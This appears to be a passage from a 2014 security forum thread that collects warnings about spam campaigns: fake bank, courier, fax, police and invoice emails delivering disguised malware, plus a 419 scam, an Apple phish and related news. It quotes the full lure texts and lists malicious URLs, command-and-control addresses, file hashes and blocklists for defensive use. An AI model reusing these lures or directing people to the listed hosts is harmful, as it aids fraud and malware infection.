- http://myonlinesecurity.co.uk/reyour-payment-schedule-pretending-come-dr-mrs-ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
Attn:Beneficiary,
My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
Teller Machine System( ATM CARD).
Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
Reply also to : fminister88 @gmail .com
Your faithfully.
Dr Mrs Ngozi O. Iweala.
Finance Of Minister.

[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecurity.co.uk/nat-west-bacs-transfer-remittance-jsag828gbp-fake-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 4933.00
Please find details at our secure link below: ...

This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/natwest-new-secure-message-file-4430-fake-pdf-malware/

- https://www.virustotal.com/en/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu/2014/09/16/fake-email-fwd-dhl-delivery-attempt-contains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
Airway Bill No: 7808130095
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Print this label to get this package at our depot/office.
Thank you
© 2014 Copyright© 2013 DHL. All Rights Reserved...

The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/57d37614dd81d48c25bec02f4481e1757cd7a5b84ccc31904635a51d70db1a44/analysis/1410870424/

:fear::fear: :mad:

AplusWebMaster
2014-09-17, 13:20
FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-no-you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
From: Fax [fax@ victimdomain .com]
Date: 17 September 2014 09:32
Subject: You've received a new fax
New fax at SCAN6405035 from EPSON by https ://victimdomain .com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustotal.com/en-gb/file/01e69a84cd47f38786affe7348fb334f2092984fa11444352ee5a0431c505f6d/analysis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/adp-invoice-with-malicious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2653224f479aa10f4e82b489987bb519f563786b676bacb76a5efba2963cd546/analysis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combine the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/ukfast-invoice.png

17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/200ef318f11db4e3975159b378a48bf2d6420c3a48d7f4c75efe1cb2acbc22b8/analysis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecurity.co.uk/strabane-weekly-news-inv0071981-newspaper-copy-fake-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
Dear Sir,
Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
Thank you,
Darragh

This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/

:fear: :mad:

AplusWebMaster
2014-09-18, 14:35
FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo.com/2014/09/important-new-account-invoice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
From: NatWest Invoice [invoice@ natwest .com]
Date: 18 September 2014 11:06
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below ...
Thank you for choosing NatWest...

The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk "
* https://www.virustotal.com/en-gb/file/9202af35dbf5620096a42766582f231654c74677ee3dcb70a5af6d178fcc0163/analysis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustotal.com/en-gb/ip-address/91.215.216.52/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 18 September 2014 11:45
Subject: Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

- http://myonlinesecurity.co.uk/nat-west-important-new-account-invoice-fake-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Nat-West-New-account-invoice.png
___

Fake eFax SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-report-fake-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
INCOMING FAX REPORT
Date/Time: Thursday, 18.09.2014
Speed: 353bps
Connection time: 08:02
Page: 4
Resolution: Normal
Remote ID: 611-748-177946
Line number: 3
DTMF/DID:
Description: Internal only ...

18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a6c3fdd158c157b0c7e4293ad0a56b8ef2b2ececd68b4c075fc4b8cc16f6922/analysis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Line Voice Message Spam
- http://threattrack.tumblr.com/post/97827881718/line-voice-message-spam
18 Sep 2014 - "Subjects Seen:
You have a voice message
Typical e-mail details:
LINE Notification
You have a voice message, listen it now.
Time: 21:12:45 14.10.2014, Duration: 45sec

Malicious URLs:
iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ad77337f36ff7e57db548378c0b961b2/tumblr_inline_nc4325Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustotal.com/en/ip-address/147.202.201.24/information/

:mad: :fear::fear:

AplusWebMaster
2014-09-19, 15:13
FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo.com/2014/09/this-fake-voice-mail-message-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
From: Microsoft Outlook [no-reply@ victimdomain .com]
Date: 19 September 2014 11:59
Subject: You have received a voice mail
You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: <REDACTED>
Download and extract to listen the message.
We have uploaded voicemail report on dropbox, please use the following link to download your file...
Sent by Microsoft Exchange Server

The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo.com/2014/09/natwest-statement-spam-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspot.com/-Oo5Lnrowt70/VBwJo-dVgRI/AAAAAAAAFpY/TzfWXXSEP88/s1600/natwest.png

192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/

- http://myonlinesecurity.co.uk/natwest-statement-fake-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/nat-west-statement.png
Current Virus total detections: 1/54*
* https://www.virustotal.com/en/file/a56ef62b4154849c04b28dd78ff2d4d383c98eb7e38785c10e9b58932f3dc0ca/analysis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-london-police-homicide-suspect-fake-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: London City Police
Sending Location: GB – London – London City Police
Bulletin Case#: 14-62597
Bulletin Author: BARILLAS #1169
Sending User #: 92856
APBnet Version: 684593
The bulletin is a pdf attachment to this email.
The Adobe Reader (from Adobe .com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.

Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecurity.co.uk/tnt-courier-service-tnt-uk-limited-package-tracking-fake-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 460911612900
Your package have been picked up and is ready for dispatch.
Connote # : 460911612900
Service Type : Export Non Documents – Intl
Shipped on : 18 Sep 14 12:00
Order No : 4240629
Status : Driver’s Return
Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions.
Please check attachment to view information about the sender and package.

19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.com/article/2014/09/19/us-sec-bitcoin-fraud-idUSKBN0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu/diary.html?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer. If you need help, please visit the Apple Support.
Apple Client Support.

A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.com/blog/2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn.com/images/news/general_malicious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn.com/images/news/youtube_malicious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."

:fear::fear: :mad:

AplusWebMaster
2014-09-22, 15:04
FYI...

Fake gov't SPAM
- http://blog.dynamoo.com/2014/09/your-online-gatewaygovuk-submission-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspot.com/-O44byyBpvKE/VCACHn_z67I/AAAAAAAAFro/5VfC-5YRsOw/s1600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411383282/

184.168.152.32: https://www.virustotal.com/en-gb/ip-address/184.168.152.32/information/

** https://anubis.iseclab.org/?action=result&task_id=19b13cf14c76380345d98780f5ac50f82&format=html

- http://myonlinesecurity.co.uk/online-gateway-gov-uk-submission-fake-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Your-online-Gateway.gov_.uk-Submission.png
...
> https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecurity.co.uk/september-22-2014-logmein-security-update-malware/
22 Sep 2014"'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear client,
We are pleased to announce that LogMeIn has released a new security certificate.
It contains new features:
• The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
• Any irregular activity on your account will be detected by our security department
• This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
Download the attached certificate. Update will be automatically installed by double click.
As always, your Logmein Support Team is happy to assist with any questions you may have.
Feel free to contact us ...

22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/

- https://isc.sans.edu/diary.html?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu/diaryimages/images/Screen%20Shot%202014-09-22%20at%2011_34_06%20AM.png
...
> https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustotal.com/en/ip-address/23.253.218.205/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecurity.co.uk/usaa-policy-renewal-please-print-auto-id-cards-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/USAA-Policy-Renewal-Please-Print-Auto-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411415107/

- http://threattrack.tumblr.com/post/98225075443/usaa-insurance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37ba5ffb65ea0fbf4857f1d0fee84e0b/tumblr_inline_nccw5e1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-invoices-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
Thank you.

22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-issued-fake-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
Yours faithfully,
Global Payments and Cash Management
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/844c016c9df09432f82f2a353151ca110c2474c7cb5f09c54ebc64952dd1174d/analysis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/peter-hogarth-sons-ltd-invoice-642555-fake-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your Invoice(s)/Credit(s)
PETER HOGARTH & SONS LTD
INDUSTRIAL HYGIENE and PROTECTION
Tel: 01472 345726 | Fax: 01472 250272 | Web...
Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
Peter Hogarth & Sons Ltd is a company registered in England.
Company Registration Number: 1143352...

22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/809f5007e7e771dbb791d08e166770b17c2de15908b300ef1a241ac9f23215d3/analysis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.com/article/2014/09/22/banks-cybersecurity-europe-idUSL6N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."

:mad: :fear:

AplusWebMaster
2014-09-23, 13:48
FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/according-to-this-spam-you-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
